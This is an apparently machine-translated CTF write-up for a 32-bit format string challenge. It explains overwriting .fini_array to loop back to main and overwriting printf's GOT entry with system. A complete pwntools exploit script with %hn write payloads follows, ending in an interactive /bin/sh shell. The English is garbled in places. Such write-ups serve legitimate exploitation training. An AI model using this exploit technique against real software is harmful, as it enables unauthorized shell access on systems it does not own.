Logic program substantially as follows, the presence system function program, protection is only opened NX
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("Welcome to my ctf! What's your name?");
__isoc99_scanf("%64s", &format);
printf("Hello ");
printf(&format);
return 0;
Format string vulnerabilities exist, but there is no other function is executed after completion of use. Only use once and no other function can be performed.
But there is a way to make the program reach an infinite loop.
A program execution process are as follows:
At the end of the .fini main function of the code will be a function pointer and function of each segment in the array .fini._arrary
We modify its function as the main address pointer can be recalled at the end of main function Recall function
We got a table of contents can be modified to printf system function call address system address
Then we look at the offset of the string we entered at the breakpoint and then printf
We located the input offset 4
Finalize the payload as follows
payload=p32(fini_array)+p32(printf_got)+"%134513964c%4$n"+"%4294966940c%5$n"However, due to the interaction problem at this time is too long to receive data, transmission ineffective. So we switched transmission hn
payload="\x9c\x97\x04\x08\x9e\x97\x04\x08\x9c\x98\x04\x08\x9e\x98\x04\x08%34084c%4$ hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"from pwn import *
p=process('./pwn')
context.log_level='debug'
p.recvuntil("Welcome to my ctf! What's your name?\n")
fini_array=0x0804979c
fini_1=0x0804979e
printf_got=0x0804989c
system_plt=0x080483d0
main_addr=0x08048534
payload="\x9c\x97\x04\x08\x9e\x97\x04\x08\x9c\x98\x04\x08\x9e\x98\x04\x08%34084c%4$hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"
#payload=p32(fini_array)+p32(printf_got)+"%134513964c%4$n%4294966940c%5$n"
p.send(payload)
sleep(2)
p.recvuntil("Welcome to my ctf! What's your name?\n")
p.sendline("/bin/sh\x00")
p.interactive()